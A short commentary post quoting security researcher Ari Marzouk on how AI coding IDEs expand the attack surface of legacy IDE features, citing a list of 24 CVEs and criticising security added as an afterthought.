I just quote two MaccariTA (Ari Marzouk) statements:
IDEs were not initially built with AI agents in mind. Adding AI components to existing applications create new attack vectors, change the attack surface and reshape the threat model. This leads to new unpredictable risks.
[…]
AI IDEs effectively ignored the base IDE software as part of the threat model, assuming it’s inherently safe because it existed for years. However, once you add AI agents that can act autonomously, the same legacy features can be weaponized into data exfiltration and RCE primitives.
and, as you can read in the original post, it is not only “risks” but also a quite long list of vulnerabilities (with 24 CVE) which affect, one way or or another, almost all AI IDE tools.
The issue is one we saw many times in the past: first features and functionalities, then we fix security. I agree that without features and functionalities any software product does not make any sense, but with security as a post add-on, there is the well known risk to have to pay a large security bill for a long time.